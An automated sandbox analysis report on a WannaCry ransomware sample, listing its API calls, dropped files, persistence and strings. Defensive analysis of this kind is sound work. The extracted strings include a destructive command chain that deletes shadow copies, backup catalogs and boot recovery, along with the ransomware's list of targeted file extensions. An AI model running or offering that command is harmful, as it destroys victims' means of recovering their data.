Analysis Report

Overview

General Information

Joe Sandbox Version: 18.0.0
Analysis ID: 268923
Start time: 16:34:45
Joe Sandbox Product: Cloud
Start date: 12.05.2017
Overall analysis duration: 0h 8m 16s
Report type: full
Sample file name: 1.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
Detection: MAL
Classification: mal68.rans.winEXE@18/171@0/0
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 22
  • Number of non-executed functions: 28
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): slui.exe, WmiApSrv.exe, WatAdminSvc.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.


Detection

Strategy: Threshold
Score: 68
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook



Signature Overview


Operating System Destruction:

Mass deletion, destroys many files
Source: c:\1.exe; File deleted: Number of file deletion 1001 exceeds threshold 400

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\1.exe; Code function: 0_2_0040182C CryptAcquireContextA
Source: C:\1.exe; Code function: 0_2_00401861 CryptImportKey
Source: C:\1.exe; Code function: 0_2_004018F9 CreateFileA, GetFileSize, GlobalAlloc, ReadFile, CryptImportKey, _local_unwind2
Source: C:\1.exe; Code function: 0_2_004018B9 CryptDestroyKey, CryptDestroyKey, CryptReleaseContext
Source: C:\1.exe; Code function: 0_2_004019E1 EnterCriticalSection, strrchr, CryptDecrypt, LeaveCriticalSection, LeaveCriticalSection, memcpy

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\1.exe; Code function: 0_2_00401861 CryptImportKey
Source: C:\1.exe; Code function: 0_2_004018F9 CreateFileA, GetFileSize, GlobalAlloc, ReadFile, CryptImportKey, _local_unwind2
Deletes shadow drive data (may be related to ransomware)
Source: 1.exe; Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: 1.exe; Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d
Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)

Networking:

Found strings which match to known social media URLs
Source: 1.exe; String found in binary or memory: Yahoo equals www.yahoo.com (Yahoo)
URLs found in memory or binary data
Source: 1.exe; String found in binary or memory: http://
Source: 1.exe; String found in binary or memory: http://%d/%d/%d
Source: 1.exe; String found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%s
Source: 1.exe; String found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: 1.exe; String found in binary or memory: https://
Source: 1.exe; String found in binary or memory: https://en.wikipedia.org/wiki/bitcoin
Source: 1.exe; String found in binary or memory: https://en.wikipedia.org/wiki/bitcoinsend
Source: 1.exe; String found in binary or memory: https://www.google.com/search?q=how

Boot Survival:

Contains functionality to start Windows services
Source: C:\1.exe; Code function: 0_2_00401CE8 OpenSCManagerA, OpenServiceA, StartServiceA, CloseServiceHandle, sprintf, CreateServiceA, StartServiceA, CloseServiceHandle, CloseServiceHandle
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\1.exe; File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD2262.tmp
Stores files to the Windows start menu directory
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD2EEE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD2EFE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD2F3E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Games\~SD2F3F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD2F50.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD2F51.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\~SD2F52.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD2F62.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD2F63.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD3231.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD3232.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\.sol Editor\~SD3233.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3243.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3244.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3245.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SD3246.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SD3257.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3258.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD3259.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD3269.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD326A.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Games\~SD326B.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD326C.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD326D.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office\~SD327E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD327F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Startup\~SD3280.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SD34AE.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SD34AF.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\.sol Editor\~SD356B.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SD356C.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Accessibility\~SD356D.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SD357E.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Tablet PC\~SD357F.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Windows PowerShell\~SD3580.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SD3590.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SD3591.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SD3592.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD35A3.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Games\~SD35A4.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SD35A5.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SD35D5.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\~SD35D6.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD35D7.tmp
Source: C:\1.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Startup\~SD35E8.tmp

Stealing of Sensitive Information:

Searches for user specific document files
Source: C:\1.exe | Key value created or modified: C:\Users\luketaylor\Documents
Source: C:\1.exe | Key value created or modified: C:\Users\Public\Documents
Source: C:\1.exe | Key value created or modified: C:\Users\Default\Documents
Source: C:\Windows\System32\icacls.exe | Key value created or modified: C:\Documents and Settings
Source: C:\Windows\System32\icacls.exe | Key value created or modified: C:\Users\Default\Documents
Source: C:\Windows\System32\icacls.exe | Key value created or modified: C:\Users\Default\Documents\My Music
Source: C:\Windows\System32\icacls.exe | Key value created or modified: C:\Users\Default\Documents\My Pictures
Source: C:\Windows\System32\icacls.exe | Key value created or modified: C:\Users\Default\Documents\My Videos
Source: C:\Windows\System32\icacls.exe | Key value created or modified: C:\Users\Public\Documents
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\1.exe | Directory queried: number of queries: 1015
Source: C:\Windows\System32\icacls.exe | Directory queried: number of queries: 1502

Persistence and Installation Behavior:

Drops PE files
Source: C:\1.exe | File created: C:\taskdl.exe
Source: C:\1.exe | File created: C:\taskse.exe
Source: C:\1.exe | File created: C:\@WanaDecryptor@.exe
Source: C:\1.exe | File created: C:\u.wnry
Command shell drops VBS files
Source: C:\Windows\System32\cmd.exe | File created: C:\\m.vbs
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\1.exe | File created: C:\u.wnry

Data Obfuscation:

Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\1.exe | Code execution: Found new code
PE file contains an invalid checksum
Source: 1.exe | Static PE information: real checksum: 0x0 should be: 0x363012

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\taskdl.exe | Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,6_2_00401080
Source: C:\taskdl.exe | Code function: 11_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,11_1_00401080
Enumerates the file system
Source: C:\1.exe | File opened: C:\Documents and Settings\All Users\Adobe\~SD123A.tmp
Source: C:\1.exe | File opened: C:\Documents and Settings\All Users\~SD1239.tmp
Source: C:\1.exe | File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD123E.tmp
Source: C:\1.exe | File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\Replicate\~SD123D.tmp
Source: C:\1.exe | File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\11.0\~SD123C.tmp
Source: C:\1.exe | File opened: C:\Documents and Settings\All Users\Adobe\Acrobat\~SD123B.tmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\1.exe | Directory queried: number of queries: 1015
Source: C:\Windows\System32\icacls.exe | Directory queried: number of queries: 1502

System Summary:

Submission file is bigger than most known malware samples
Source: 1.exe | Static file information: File size 3514368 > 1048576
Uses new MSVCR Dlls
Source: C:\Windows\System32\icacls.exe | File opened: C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\msvcr90.dll
PE file has a big raw section
Source: 1.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000
Binary contains paths to development resources
Source: 1.exe | Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: 1.exe | Binary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\Ap
Source: 1.exe | Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Classification label
Source: classification engine | Classification label: mal68.rans.winEXE@18/171@0/0
Contains functionality to create services
Source: C:\1.exe | Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00401CE8
Contains functionality to load and extract PE file embedded resources
Source: C:\1.exe | Code function: 0_2_00401DAB strrchr,FindResourceA,LoadResource,LockResource,SizeofResource,strcmp,GetFileAttributesA,0_2_00401DAB
Contains functionality to modify services (start/stop/modify)
Source: C:\1.exe | Code function: 0_2_00401CE8 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00401CE8
Creates files inside the user directory
Source: C:\1.exe | File created: C:\Users\luketaylor\Desktop\~SDC22E.tmp
Creates temporary files
Source: C:\1.exe | File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\RAC\Temp\~SD1665.tmp
Executes batch files
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 67541494599812.bat
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Found command line output
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...M".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...S"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...Y".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..._".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...e"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...k".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...q".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...w"................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...}".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...."..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....".............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...."................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....".............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...%#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...+#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...1#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...7#.............................w......$.t.!.....T.!...!...!.................
